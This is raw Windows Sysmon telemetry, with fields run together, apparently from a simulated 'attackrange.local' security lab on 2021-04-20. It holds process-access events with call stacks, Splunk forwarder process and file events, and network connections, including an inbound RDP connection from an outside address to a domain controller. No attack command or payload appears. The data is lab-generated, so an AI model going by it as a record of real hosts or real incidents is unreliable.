14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050878Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050877Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050876Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC6B-607E-F806-00000000BB01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050875Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.339{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6B-607E-F806-00000000BB01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050874Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.340{85C0FFC9-EC6B-607E-F806-00000000BB01}1776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050873Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:55.026{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E707B116086627031A78A120619BF8,SHA256=2DDDA8A5C4BBEE34426E201D85327F6B642681E8DDB21188950B8DB43EEE8DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:56.964{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7963874F34E0976757ECC47E4898E02,SHA256=B3242CCA4D73FD0A13168A6708CDB6A3F9ACFD58056E31105BFE444E2033E9F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:55.344{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46687-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:54.732{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57662-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000082193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:54.732{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57662-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 23542300x800000000000000082192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:56.230{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD622051D154B2A3BD2B9DAAE3959CCA,SHA256=67CB708C8080B4FDAEE890DB744CC4E12B7C957994F1D38B19BB803334BBBF74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050916Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050915Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050914Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050913Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050912Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050911Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050910Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050909Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050908Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050907Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EC6C-607E-FA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050906Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC6C-607E-FA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050905Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.995{85C0FFC9-EC6C-607E-FA06-00000000BB01}960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050904Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:54.725{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52555-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050903Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.479{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D20068C7C84C282FA55891D7AA9E15,SHA256=DA70E14729431DB63A138E3390AD3BD0E28364075BF819252B973D70B210C9FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050902Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.479{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F0BCCF57587D5EEF18A32028236FF2D,SHA256=4DE82A00FB283AC138FA469AAB65E44B169E7BC730A94C1A2D5BD9CFC525FCCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050901Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC6C-607E-F906-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050900Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050899Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050898Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:56.010{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050897Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 